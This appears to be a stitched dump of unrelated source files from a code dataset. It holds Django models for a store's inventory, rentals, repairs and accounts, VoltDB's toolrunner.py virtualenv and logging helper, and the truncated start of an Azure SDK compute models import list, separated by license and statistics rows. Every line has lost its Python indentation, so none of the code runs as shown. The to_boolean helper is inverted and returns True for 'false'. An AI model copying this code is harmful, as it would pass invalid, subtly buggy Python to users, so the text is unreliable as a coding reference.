class Category(models.Model):
category_name = models.CharField(max_length=200, blank=True, null=True)
category_description = models.CharField(max_length=500, blank=True, null=True)
def __str__(self):
return '%s' % (self.category_name)
class Brand(models.Model):
brand_name = models.CharField(max_length=200, blank=True, null=True)
def __str__(self):
return '%s' % (self.brand_name)
class Catalog_Item(models.Model):
active = models.BooleanField(default=True)
sku = models.CharField(max_length=200, blank=True, null=True)
product_name = models.CharField(max_length=200, blank=True, null=True)
availability = models.IntegerField(max_length=3, blank=True, null=True)
category = models.ForeignKey(Category)
brand = models.ForeignKey(Brand)
description = models.CharField(max_length=500, blank=True, null=True)
cost = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
price = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
comission_rate = models.DecimalField(max_digits=2, decimal_places=2, blank=True, null=True)
product_count = models.IntegerField(blank=True, null=True)
rentable = models.BooleanField(default = False)
daily_rent_rate = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
def __str__(self):
return '%s: %s' % (self.sku, self.product_name)
class Serial_Inventory(Catalog_Item):
serial = models.CharField(max_length=200, blank=True, null=True)
store_location = models.ForeignKey(Store)
shelf_location = models.CharField(max_length=200, blank=True, null=True)
date_purchased = models.DateTimeField(blank=True, null=True)
def __str__(self):
return '%s: %s' % (self.serial, self.product_name)
class Bulk_Inventory(Catalog_Item):
store_location = models.CharField(max_length=200, blank=True, null=True)
shelf_location = models.CharField(max_length=200, blank=True, null=True)
def __str__(self):
return '%s' % (self.product_name)
class Rental(models.Model):
customer = models.ForeignKey(amod.User)
rental_item = models.ForeignKey(Catalog_Item)
date_out = models.DateField(auto_now=False, auto_now_add=False, null=True)
expected_return = models.DateField(auto_now=False, auto_now_add=False, null=True)
pre_condition = models.CharField(max_length=200, blank=True, null=True)
date_returned = models.DateField(auto_now=False, auto_now_add=False, blank=True, null=True)
post_condition = models.CharField(max_length=200, blank=True, null=True)
total_days_late = models.IntegerField(blank=True, null=True)
late_fees = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
damage_report = models.CharField(max_length=200, blank=True, null=True)
damage_fees = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
total_fees = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
returned = models.BooleanField(default = False)
class Repair_Status(models.Model):
status = models.CharField(max_length=200, blank=True, null=True)
def __str__(self):
return '%s' % (self.status)
class Repair_Item(models.Model):
customer = models.ForeignKey(amod.User)
repair_item = models.CharField(max_length=200, blank=True, null=True)
date_in = models.DateField(auto_now=False, auto_now_add=False, null=True)
expected_return = models.DateField(auto_now=False, auto_now_add=False, blank=True, null=True)
issue = models.CharField(max_length=200, blank=True, null=True)
status = models.ForeignKey(Repair_Status)
damage_report = models.CharField(max_length=200, blank=True, null=True)
date_returned = models.DateField(auto_now=False, auto_now_add=False, blank=True, null=True)
repairs = models.CharField(max_length=200, blank=True, null=True)
repair_fees = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
returned = models.BooleanField(default = False)
paid_for = models.BooleanField(default = False)
#Accounts
class BalanceSheetAccounts(models.Model):
account_name = models.CharField(max_length=200, blank=True, null=True)
class Inventory(BalanceSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
class Cash(BalanceSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
class PrepaidServiceLiability(BalanceSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
class IncomeSheetAccounts(models.Model):
account_name = models.CharField(max_length=200, blank=True, null=True)
date = models.CharField(max_length=200, blank=True, null=True)
class Revenue(IncomeSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
class ComissionsExpense(IncomeSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
class SalesTaxPayable(IncomeSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
| apache-2.0 | -1,022,488,772,565,956,200 | 43.125874 | 98 | 0.712995 | false |
migue/voltdb | tools/toolrunner.py | 2 | 19296 | # This file is part of VoltDB.
# Copyright (C) 2008-2017 VoltDB Inc.
#
# This file contains original code and/or modifications of original code.
# Any modifications made by VoltDB Inc. are licensed under the following
# terms and conditions:
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
# Performs the initialization "grunt" work for various voltcli tool scripts.
#
# It assumes a relative location in a root subdirectory of a voltdb
# distribution. The logic is minimal since the heavy lifting happens in
# runner.main(). The calling script name determines the verbs that are loaded
# from <name>.d subdirectories. It loads the version number from version.txt in
# the script's parent directory. It supports using a virtual environment with
# custom auto-installed libraries.
#
# main() starts with the system Python libraries.
# vmain() starts in an isolated virtual environment with custom libraries.
import sys
import os
import subprocess
import shutil
import re
import glob
import copy
class G:
"""
Globals.
"""
script = os.path.realpath(sys.argv[0])
script_dir, script_name = os.path.split(script)
base_dir = os.path.dirname(script_dir)
# Use ~/.<script> as the output directory for logging and virtual environments.
user_dir = os.path.expanduser(os.path.join('~', '.voltdb'))
log_path = os.path.join(user_dir, 'logs', '%s.log' % script_name)
module_path = os.path.realpath(__file__)
# Opened by main() and vmain()
log_file = None
verbose = False
# Full path glob of virtualenv packages. The latest is chosen based on the parsed version number.
virtualenv_package_glob = os.path.join(base_dir, 'third_party', 'python', 'packages', 'virtualenv-*.tar.gz')
virtualenv_parse_re = re.compile('^.*/(virtualenv-([0-9.]+))[.]tar[.]gz$')
def get_version(base_dir, error_abort=True):
try:
# noinspection PyUnresolvedReferences
return open(os.path.join(base_dir, 'version.txt')).read().strip()
except (IOError, OSError), e:
if error_abort:
abort('Unable to read version.txt.', e)
return None
def go(cmd_name,
cmd_dir,
base_dir,
description,
standalone,
directory,
verbose,
libpath,
*args):
"""
Run tool after tweaking the Python library path to find voltcli libraries.
Optionally change to a relative or absolute directory provided by the
caller. The base directory is this file's parent directory and serves as
the default working directory.
:param cmd_name:
:param cmd_dir:
:param base_dir:
:param description:
:param standalone:
:param directory:
:param verbose:
:param libpath:
:param args:
"""
G.verbose = verbose
# Append libpath to module loading path.
if libpath:
sys.path.extend(libpath.split(':'))
start_logging()
try:
version = get_version(base_dir)
if os.path.isdir('/opt/lib/voltdb/python'):
sys.path.insert(0, '/opt/lib/voltdb/python')
if os.path.isdir('/usr/share/lib/voltdb/python'):
sys.path.insert(0, '/usr/share/lib/voltdb/python')
if os.path.isdir('/usr/lib/voltdb/python'):
sys.path.insert(0, '/usr/lib/voltdb/python')
# Library location relative to script.
sys.path.insert(0, os.path.join(base_dir, 'lib', 'python'))
if directory:
os.chdir(directory)
runner = None
try:
# noinspection PyUnresolvedReferences
from voltcli import runner
except ImportError:
abort('Unable to import voltcli.runner using the following path:', sys.path)
runner.main(cmd_name, cmd_dir, version, description,
standalone=to_boolean(standalone), *args)
finally:
stop_logging()
def main(description='(no description)',
standalone=False,
directory=None,
verbose=False,
libpath='',
command_name=None):
"""
Main entry point for commands not running in a virtual environment.
:param description:
:param standalone:
:param directory:
:param verbose:
:param libpath:
"""
cmd_path = sys.argv[0]
cmd_dir, cmd_name = os.path.split(os.path.realpath(cmd_path))
if not command_name is None:
cmd_name = command_name
base_dir = os.path.dirname(cmd_dir)
go(cmd_name, cmd_dir, base_dir, description, standalone, directory, verbose, libpath, *sys.argv[1:])
def get_virtualenv():
"""
Find the virtualenv runtime. Fall back to using one from
third_party/python/packages. Untar it under the working folder. Return a
command line argument list.
"""
virtualenv = find_in_path('virtualenv', required=False)
if virtualenv:
return [virtualenv]
# Find the latest package.
latest_version = []
latest_package_path = None
latest_package_name = None
for package_path in glob.glob(G.virtualenv_package_glob):
m = G.virtualenv_parse_re.match(package_path)
if m:
version = [int(i) for i in m.group(2).split('.')]
# Zero-pad the versions for comparison.
if len(version) > len(latest_version):
latest_version.extend([0] * (len(version) - len(latest_version)))
elif len(latest_version) > len(version):
version.extend([0] * (len(latest_version) - len(version)))
for iv in range(len(version)):
if version[iv] > latest_version[iv]:
latest_version = copy.copy(version)
latest_package_path = package_path
latest_package_name = m.group(1)
break
elif version[iv] < latest_version[iv]:
break
else:
warning('Failed to parse virtualenv package path: %s' % package_path)
if not latest_package_path:
abort('virtualenv is missing.', 'See https://pypi.python.org/pypi/virtualenv.')
info('Unpacking the distribution copy of virtualenv:', [latest_package_path])
returncode = os.system('tar xf "%s"' % latest_package_path)
if returncode != 0:
abort('Failed to extract the virtualenv package.')
return ['python', os.path.join(os.getcwd(), latest_package_name, 'virtualenv.py')]
# Internal function to build/rebuild the virtual environment
def _build_virtual_environment(venv_dir, version, packages):
# Wipe any existing virtual environment directory.
if os.path.exists(venv_dir):
try:
shutil.rmtree(venv_dir)
except (IOError, OSError), e:
abort('Failed to remove existing virtual environment.', (venv_dir, e))
# Create the directory as needed.
if not os.path.isdir(venv_dir):
os.makedirs(venv_dir)
# Save version.txt in the venv root directory.
try:
version_path = os.path.join(venv_dir, 'version.txt')
f = open(version_path, 'w')
try:
try:
f.write(version)
except (IOError, OSError), e:
abort('Failed to write version file.', (version_path, e))
finally:
f.close()
except (IOError, OSError), e:
abort('Failed to open version file for writing.', (version_path, e))
# Prefer to use the system virtualenv, but fall back to the third_party copy.
save_dir = os.getcwd()
save_lc_all = os.environ.get('LC_ALL', None)
# Makes sure a pip failure provides clean output instead of a Unicode error.
os.environ['LC_ALL'] = 'C'
try:
os.chdir(os.path.dirname(venv_dir))
args = get_virtualenv()
pip = os.path.join(venv_dir, 'bin', 'pip')
info('Preparing the %s Python virtual environment:' % G.script_name, [
'(an Internet connection is required)',
'Folder: %s' % venv_dir])
args += ['--clear', '--system-site-packages', sys.platform]
run_cmd(*args)
if packages:
for package in packages:
info('Installing virtual environment package: %s' % package)
run_cmd(pip, 'install', package)
finally:
os.chdir(save_dir)
if save_lc_all is None:
del os.environ['LC_ALL']
else:
os.environ['LC_ALL'] = save_lc_all
def vmain(description='(no description)',
standalone=False,
directory='',
packages=None,
verbose=False,
libpath=''):
"""
Main entry point for commands running in an auto-generated virtual environment.
:param description:
:param standalone:
:param directory:
:param packages:
:param verbose:
"""
G.verbose = verbose
start_logging()
# Set up virtual environment under home since it should be write-able.
output_dir = os.path.join(G.user_dir, G.script_name)
# Make sure the output directory is available.
if not os.path.isdir(output_dir):
if os.path.exists(output_dir):
abort('Output path "%s" exists, but is not a directory.' % output_dir,
'Please move or delete it before running this command again.')
try:
os.makedirs(output_dir)
except (IOError, OSError), e:
abort('Output path "%s" exists, but is not a directory.' % output_dir,
'Please move or delete it before running this command again.', e)
venv_base = os.path.join(output_dir, 'venv')
venv_dir = os.path.join(venv_base, sys.platform)
venv_complete = False
version = get_version(os.path.dirname(G.script_dir))
try:
build_venv = not os.path.isdir(venv_dir)
if not build_venv:
# If the virtual environment is present check that it's current.
# If version.txt is not present leave it alone so that we don't
# get in the situation where the virtual environment gets
# recreated every time.
venv_version = get_version(venv_dir, error_abort=False)
if venv_version is None:
warning('Unable to read the version file:',
[os.path.join(venv_dir, 'version.txt')],
'Assuming that the virtual environment is current.',
'To force a rebuild delete the virtual environment base directory:',
[venv_base])
else:
build_venv = venv_version != version
if build_venv:
_build_virtual_environment(venv_dir, version, packages)
venv_complete = True
# Exec the toolrunner.py script inside the virtual environment by using
# the virtual environment's Python.
python = os.path.join(venv_dir, 'bin', 'python')
args = [
python,
G.module_path,
G.script_name,
G.script_dir,
os.path.dirname(G.script_dir),
str(description),
str(standalone),
str(directory),
str(verbose),
libpath,
] + sys.argv[1:]
verbose_info('Re-starting with virtual environment:', args)
os.execvp(python, args)
except KeyboardInterrupt:
sys.stderr.write('\n<break>\n')
finally:
stop_logging()
# Avoid confusion by cleaning up incomplete virtual environments.
if not venv_complete and os.path.exists(venv_dir):
warning('Removing incomplete virtual environment after installation failure ...')
shutil.rmtree(venv_dir, True)
def to_boolean(value):
"""
Utility function to convert a value to boolean.
:param value:
"""
# noinspection PyBroadException
try:
# Raises AttributeError if lower() is called on a bool.
return value.lower() == 'false'
except:
return bool(value)
def start_logging():
"""
Open log file.
"""
base_dir = os.path.dirname(G.log_path)
if not os.path.exists(base_dir):
try:
os.makedirs(base_dir)
except (IOError, OSError), e:
abort('Failed to create log directory.', (base_dir, e))
try:
G.log_file = open(G.log_path, 'w')
except (IOError, OSError), e:
abort('Failed to open log file.', G.log_path, e)
def stop_logging():
"""
Close log file.
"""
if G.log_file:
G.log_file.close()
G.log_file = None
def find_in_path(name, required=False):
"""
Find program in the system path.
:rtype : str
"""
# NB: Won't work on Windows.
for dir_path in os.environ['PATH'].split(':'):
if os.path.exists(os.path.join(dir_path, name)):
return os.path.join(dir_path, name)
if required:
abort('Command "%s" not found in path:' % name, os.environ['PATH'].split(':'))
return None
def pipe_cmd(*args):
"""
Run program, capture output, and yield each output line for iteration.
"""
try:
verbose_info('Running external command:', args)
proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
for line in iter(proc.stdout.readline, ''):
yield False, line.rstrip()
for line in iter(proc.stderr.readline, ''):
yield True, line.rstrip()
proc.stdout.close()
proc.stderr.close()
returncode = proc.wait()
if returncode != 0:
abort('Command failed with return code %d:' % returncode, (' '.join(args),))
except Exception, e:
abort('Exception running command: %s' % ' '.join(args), e)
def run_cmd(*args):
"""
Run program and capture output in the log file.
"""
for is_error, line in pipe_cmd(*args):
if G.log_file:
if is_error:
s = '[ERROR] %s\n' % line
G.log_file.write(s)
sys.stderr.write(s)
else:
s = '%s\n' % line
G.log_file.write(s)
if G.verbose:
sys.stdout.write(s)
G.log_file.flush()
else:
sys.stdout.write(line)
sys.stdout.write('\n')
def is_string(item):
"""
Return True if the item behaves like a string.
:type item: str
:param item:
"""
try:
# noinspection PyUnusedLocal
v = item + ''
return True
except TypeError:
return False
def output_messages(msgs, f=sys.stdout, tag=None, level=0):
"""
Low level message display.
:param msgs:
:param f:
:param tag:
:param level:
"""
def write(s):
f.write(s)
if G.log_file:
G.log_file.write(s)
G.log_file.flush()
if tag:
stag = '%8s: ' % tag
else:
stag = ''
# msgs can be a single string or an iterable object.
if is_string(msgs):
msgs = [msgs]
sindent = level * ' '
# Recursively process message list and sub-lists.
for msg in msgs:
if msg is not None:
# Handle exceptions
if issubclass(msg.__class__, Exception):
write('%s%s%s Exception: %s\n' % (stag, sindent, msg.__class__.__name__, str(msg)))
else:
# Handle multi-line strings
if is_string(msg):
# If it is a string slice and dice it by linefeeds.
for msg2 in msg.split('\n'):
write('%s%s%s\n' % (stag, sindent, msg2))
else:
# Recursively display an iterable with indentation added.
if hasattr(msg, '__iter__'):
output_messages(msg, f=f, tag=tag, level=level + 1)
else:
for msg2 in str(msg).split('\n'):
write('%s%s%s\n' % (stag, sindent, msg2))
def info(*msgs):
"""
Display INFO level messages.
:type msgs: list
:param msgs:
"""
output_messages(msgs, tag='INFO')
def verbose_info(*msgs):
"""
Display verbose INFO level messages if enabled.
:type msgs: list
:param msgs:
"""
if G.verbose:
output_messages(msgs, tag='INFO2')
def warning(*msgs):
"""
Display WARNING level messages.
:type msgs: list
:param msgs:
"""
output_messages(msgs, tag='WARNING')
def error(*msgs):
"""
Display ERROR level messages.
:type msgs: list
:param msgs:
"""
output_messages(msgs, tag='ERROR')
def abort(*msgs):
"""
Display ERROR messages and then abort.
:type msgs: list
:param msgs:
"""
error(*msgs)
if G.log_file:
info('See log file "%s" for more details.' % G.log_path)
sys.stderr.write('\n')
output_messages('Exiting.', f=sys.stderr, tag='FATAL')
stop_logging()
sys.exit(1)
def env_path_fix(envvar, check_folders, check_globs):
"""
Add folder as needed to an environment path variable if file or files
can't be resolved without it. Return True if resolved.
"""
found_in_folder = None
# Look for files in existing and additional folders.
path_folders = [f for f in os.environ.get(envvar, '').split(':') if f]
for folder in path_folders + check_folders:
for check_glob in check_globs:
if glob.glob(os.path.join(folder, check_glob)):
found_in_folder = folder
if found_in_folder:
break
# Add to the path as needed.
if found_in_folder:
if not found_in_folder in path_folders:
os.environ[envvar] = ':'.join(path_folders + [found_in_folder])
else:
warning('Unable to resolve files using the "%s" environment variable.' % envvar)
warning('Files to resolve:', check_globs)
if path_folders:
warning('Existing "%s" folders:' % envvar, path_folders)
if check_folders:
warning('Additional folders checked:', check_folders)
return not found_in_folder is None
if __name__ == '__main__':
# vmain() re-exec's this script after setting up a virtual environment.
# Since it runs with the virtual environment Python and libraries, just
# call the main() here. It will convert CLI string arguments as needed.
go(*sys.argv[1:])
| agpl-3.0 | -6,562,185,719,734,969,000 | 33.767568 | 112 | 0.599502 | false |
Azure/azure-sdk-for-python | sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2019_03_01/models/__init__.py | 1 | 35488 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import AccessUri
from ._models_py3 import AdditionalCapabilities
from ._models_py3 import AdditionalUnattendContent
from ._models_py3 import ApiEntityReference
from ._models_py3 import ApiError
from ._models_py3 import ApiErrorBase
from ._models_py3 import AutomaticOSUpgradePolicy
from ._models_py3 import AutomaticOSUpgradeProperties
from ._models_py3 import AutomaticRepairsPolicy
from ._models_py3 import AvailabilitySet
from ._models_py3 import AvailabilitySetListResult
from ._models_py3 import AvailabilitySetUpdate
from ._models_py3 import BillingProfile
from ._models_py3 import BootDiagnostics
from ._models_py3 import BootDiagnosticsInstanceView
from ._models_py3 import ComputeOperationListResult
from ._models_py3 import ComputeOperationValue
from ._models_py3 import CreationData
from ._models_py3 import DataDisk
from ._models_py3 import DataDiskImage
from ._models_py3 import DedicatedHost
from ._models_py3 import DedicatedHostAllocatableVM
from ._models_py3 import DedicatedHostAvailableCapacity
from ._models_py3 import DedicatedHostGroup
from ._models_py3 import DedicatedHostGroupListResult
from ._models_py3 import DedicatedHostGroupUpdate
from ._models_py3 import DedicatedHostInstanceView
from ._models_py3 import DedicatedHostListResult
from ._models_py3 import DedicatedHostUpdate
from ._models_py3 import DiagnosticsProfile
from ._models_py3 import DiffDiskSettings
from ._models_py3 import Disallowed
from ._models_py3 import Disk
from ._models_py3 import DiskEncryptionSettings
from ._models_py3 import DiskInstanceView
from ._models_py3 import DiskList
from ._models_py3 import DiskSku
from ._models_py3 import DiskUpdate
from ._models_py3 import EncryptionSettingsCollection
from ._models_py3 import EncryptionSettingsElement
from ._models_py3 import Gallery
from ._models_py3 import GalleryApplication
from ._models_py3 import GalleryApplicationList
from ._models_py3 import GalleryApplicationVersion
from ._models_py3 import GalleryApplicationVersionList
from ._models_py3 import GalleryApplicationVersionPublishingProfile
from ._models_py3 import GalleryArtifactPublishingProfileBase
from ._models_py3 import GalleryArtifactSource
from ._models_py3 import GalleryDataDiskImage
from ._models_py3 import GalleryDiskImage
from ._models_py3 import GalleryIdentifier
from ._models_py3 import GalleryImage
from ._models_py3 import GalleryImageIdentifier
from ._models_py3 import GalleryImageList
from ._models_py3 import GalleryImageVersion
from ._models_py3 import GalleryImageVersionList
from ._models_py3 import GalleryImageVersionPublishingProfile
from ._models_py3 import GalleryImageVersionStorageProfile
from ._models_py3 import GalleryList
from ._models_py3 import GalleryOSDiskImage
from ._models_py3 import GrantAccessData
from ._models_py3 import HardwareProfile
from ._models_py3 import Image
from ._models_py3 import ImageDataDisk
from ._models_py3 import ImageDiskReference
from ._models_py3 import ImageListResult
from ._models_py3 import ImageOSDisk
from ._models_py3 import ImagePurchasePlan
from ._models_py3 import ImageReference
from ._models_py3 import ImageStorageProfile
from ._models_py3 import ImageUpdate
from ._models_py3 import InnerError
from ._models_py3 import InstanceViewStatus
from ._models_py3 import KeyVaultAndKeyReference
from ._models_py3 import KeyVaultAndSecretReference
from ._models_py3 import KeyVaultKeyReference
from ._models_py3 import KeyVaultSecretReference
from ._models_py3 import LinuxConfiguration
from ._models_py3 import ListUsagesResult
from ._models_py3 import LogAnalyticsInputBase
from ._models_py3 import LogAnalyticsOperationResult
from ._models_py3 import LogAnalyticsOutput
from ._models_py3 import MaintenanceRedeployStatus
from ._models_py3 import ManagedArtifact
from ._models_py3 import ManagedDiskParameters
from ._models_py3 import NetworkInterfaceReference
from ._models_py3 import NetworkProfile
from ._models_py3 import OSDisk
from ._models_py3 import OSDiskImage
from ._models_py3 import OSProfile
from ._models_py3 import Plan
from ._models_py3 import ProximityPlacementGroup
from ._models_py3 import ProximityPlacementGroupListResult
from ._models_py3 import ProximityPlacementGroupUpdate
from ._models_py3 import PurchasePlan
from ._models_py3 import RecommendedMachineConfiguration
from ._models_py3 import RecoveryWalkResponse
from ._models_py3 import RegionalReplicationStatus
from ._models_py3 import ReplicationStatus
from ._models_py3 import RequestRateByIntervalInput
from ._models_py3 import Resource
from ._models_py3 import ResourceRange
from ._models_py3 import RollbackStatusInfo
from ._models_py3 import RollingUpgradePolicy
from ._models_py3 import RollingUpgradeProgressInfo
from ._models_py3 import RollingUpgradeRunningStatus
from ._models_py3 import RollingUpgradeStatusInfo
from ._models_py3 import RunCommandDocument
from ._models_py3 import RunCommandDocumentBase
from ._models_py3 import RunCommandInput
from ._models_py3 import RunCommandInputParameter
from ._models_py3 import RunCommandListResult
from ._models_py3 import RunCommandParameterDefinition
from ._models_py3 import RunCommandResult
from ._models_py3 import ScaleInPolicy
from ._models_py3 import ScheduledEventsProfile
from ._models_py3 import Sku
from ._models_py3 import Snapshot
from ._models_py3 import SnapshotList
from ._models_py3 import SnapshotSku
from ._models_py3 import SnapshotUpdate
from ._models_py3 import SourceVault
from ._models_py3 import SshConfiguration
from ._models_py3 import SshPublicKey
from ._models_py3 import StorageProfile
from ._models_py3 import SubResource
from ._models_py3 import SubResourceReadOnly
from ._models_py3 import TargetRegion
from ._models_py3 import TerminateNotificationProfile
from ._models_py3 import ThrottledRequestsInput
from ._models_py3 import UpdateResource
from ._models_py3 import UpgradeOperationHistoricalStatusInfo
from ._models_py3 import UpgradeOperationHistoricalStatusInfoProperties
from ._models_py3 import UpgradeOperationHistoryStatus
from ._models_py3 import UpgradePolicy
from ._models_py3 import Usage
from ._models_py3 import UsageName
from ._models_py3 import UserArtifactManage
from ._models_py3 import UserArtifactSource
from ._models_py3 import UserAssignedIdentitiesValue
from ._models_py3 import VMScaleSetConvertToSinglePlacementGroupInput
from ._models_py3 import VaultCertificate
from ._models_py3 import VaultSecretGroup
from ._models_py3 import VirtualHardDisk
from ._models_py3 import VirtualMachine
from ._models_py3 import VirtualMachineAgentInstanceView
from ._models_py3 import VirtualMachineCaptureParameters
from ._models_py3 import VirtualMachineCaptureResult
from ._models_py3 import VirtualMachineExtension
from ._models_py3 import VirtualMachineExtensionHandlerInstanceView
from ._models_py3 import VirtualMachineExtensionImage
from ._models_py3 import VirtualMachineExtensionInstanceView
from ._models_py3 import VirtualMachineExtensionUpdate
from ._models_py3 import VirtualMachineExtensionsListResult
from ._models_py3 import VirtualMachineHealthStatus
from ._models_py3 import VirtualMachineIdentity
from ._models_py3 import VirtualMachineImage
from ._models_py3 import VirtualMachineImageResource
from ._models_py3 import VirtualMachineInstanceView
from ._models_py3 import VirtualMachineListResult
from ._models_py3 import VirtualMachineReimageParameters
from ._models_py3 import VirtualMachineScaleSet
from ._models_py3 import VirtualMachineScaleSetDataDisk
from ._models_py3 import VirtualMachineScaleSetExtension
from ._models_py3 import VirtualMachineScaleSetExtensionListResult
from ._models_py3 import VirtualMachineScaleSetExtensionProfile
from ._models_py3 import VirtualMachineScaleSetIPConfiguration
from ._models_py3 import VirtualMachineScaleSetIdentity
from ._models_py3 import VirtualMachineScaleSetIdentityUserAssignedIdentitiesValue
from ._models_py3 import VirtualMachineScaleSetInstanceView
from ._models_py3 import VirtualMachineScaleSetInstanceViewStatusesSummary
from ._models_py3 import VirtualMachineScaleSetIpTag
from ._models_py3 import VirtualMachineScaleSetListOSUpgradeHistory
from ._models_py3 import VirtualMachineScaleSetListResult
from ._models_py3 import VirtualMachineScaleSetListSkusResult
from ._models_py3 import VirtualMachineScaleSetListWithLinkResult
from ._models_py3 import VirtualMachineScaleSetManagedDiskParameters
from ._models_py3 import VirtualMachineScaleSetNetworkConfiguration
from ._models_py3 import VirtualMachineScaleSetNetworkConfigurationDnsSettings
from ._models_py3 import VirtualMachineScaleSetNetworkProfile
from ._models_py3 import VirtualMachineScaleSetOSDisk
from ._models_py3 import VirtualMachineScaleSetOSProfile
from ._models_py3 import VirtualMachineScaleSetPublicIPAddressConfiguration
from ._models_py3 import VirtualMachineScaleSetPublicIPAddressConfigurationDnsSettings
from ._models_py3 import VirtualMachineScaleSetReimageParameters
from ._models_py3 import VirtualMachineScaleSetSku
from ._models_py3 import VirtualMachineScaleSetSkuCapacity
from ._models_py3 import VirtualMachineScaleSetStorageProfile
from ._models_py3 import VirtualMachineScaleSetUpdate
from ._models_py3 import VirtualMachineScaleSetUpdateIPConfiguration
from ._models_py3 import VirtualMachineScaleSetUpdateNetworkConfiguration
from ._models_py3 import VirtualMachineScaleSetUpdateNetworkProfile
from ._models_py3 import VirtualMachineScaleSetUpdateOSDisk
from ._models_py3 import VirtualMachineScaleSetUpdateOSProfile
from ._models_py3 import VirtualMachineScaleSetUpdatePublicIPAddressConfiguration
from ._models_py3 import VirtualMachineScaleSetUpdateStorageProfile
from ._models_py3 import VirtualMachineScaleSetUpdateVMProfile
from ._models_py3 import VirtualMachineScaleSetVM
from ._models_py3 import VirtualMachineScaleSetVMExtensionsSummary
from ._models_py3 import VirtualMachineScaleSetVMInstanceIDs
from ._models_py3 import VirtualMachineScaleSetVMInstanceRequiredIDs
from ._models_py3 import VirtualMachineScaleSetVMInstanceView
from ._models_py3 import VirtualMachineScaleSetVMListResult
from ._models_py3 import VirtualMachineScaleSetVMNetworkProfileConfiguration
from ._models_py3 import VirtualMachineScaleSetVMProfile
from ._models_py3 import VirtualMachineScaleSetVMProtectionPolicy
from ._models_py3 import VirtualMachineScaleSetVMReimageParameters
from ._models_py3 import VirtualMachineSize
from ._models_py3 import VirtualMachineSizeListResult
from ._models_py3 import VirtualMachineStatusCodeCount
from ._models_py3 import VirtualMachineUpdate
from ._models_py3 import WinRMConfiguration
from ._models_py3 import WinRMListener
from ._models_py3 import WindowsConfiguration
except (SyntaxError, ImportError):
from ._models import AccessUri # type: ignore
from ._models import AdditionalCapabilities # type: ignore
from ._models import AdditionalUnattendContent # type: ignore
from ._models import ApiEntityReference # type: ignore
from ._models import ApiError # type: ignore
from ._models import ApiErrorBase # type: ignore
from ._models import AutomaticOSUpgradePolicy # type: ignore
from ._models import AutomaticOSUpgradeProperties # type: ignore
from ._models import AutomaticRepairsPolicy # type: ignore
from ._models import AvailabilitySet # type: ignore
from ._models import AvailabilitySetListResult # type: ignore
from ._models import AvailabilitySetUpdate # type: ignore
from ._models import BillingProfile # type: ignore
from ._models import BootDiagnostics # type: ignore
from ._models import BootDiagnosticsInstanceView # type: ignore
from ._models import ComputeOperationListResult # type: ignore
from ._models import ComputeOperationValue # type: ignore
from ._models import CreationData # type: ignore
from ._models import DataDisk # type: ignore
from ._models import DataDiskImage # type: ignore
from ._models import DedicatedHost # type: ignore
from ._models import DedicatedHostAllocatableVM # type: ignore
from ._models import DedicatedHostAvailableCapacity # type: ignore
from ._models import DedicatedHostGroup # type: ignore
from ._models import DedicatedHostGroupListResult # type: ignore
from ._models import DedicatedHostGroupUpdate # type: ignore
from ._models import DedicatedHostInstanceView # type: ignore
from ._models import DedicatedHostListResult # type: ignore
from ._models import DedicatedHostUpdate # type: ignore
from ._models import DiagnosticsProfile # type: ignore
from ._models import DiffDiskSettings # type: ignore
from ._models import Disallowed # type: ignore
from ._models import Disk # type: ignore
from ._models import DiskEncryptionSettings # type: ignore
from ._models import DiskInstanceView # type: ignore
from ._models import DiskList # type: ignore
from ._models import DiskSku # type: ignore
from ._models import DiskUpdate # type: ignore
from ._models import EncryptionSettingsCollection # type: ignore
from ._models import EncryptionSettingsElement # type: ignore
from ._models import Gallery # type: ignore
from ._models import GalleryApplication # type: ignore
from ._models import GalleryApplicationList # type: ignore
from ._models import GalleryApplicationVersion # type: ignore
from ._models import GalleryApplicationVersionList # type: ignore
from ._models import GalleryApplicationVersionPublishingProfile # type: ignore
from ._models import GalleryArtifactPublishingProfileBase # type: ignore
from ._models import GalleryArtifactSource # type: ignore
from ._models import GalleryDataDiskImage # type: ignore
from ._models import GalleryDiskImage # type: ignore
from ._models import GalleryIdentifier # type: ignore
from ._models import GalleryImage # type: ignore
from ._models import GalleryImageIdentifier # type: ignore
from ._models import GalleryImageList # type: ignore
from ._models import GalleryImageVersion # type: ignore
from ._models import GalleryImageVersionList # type: ignore
from ._models import GalleryImageVersionPublishingProfile # type: ignore
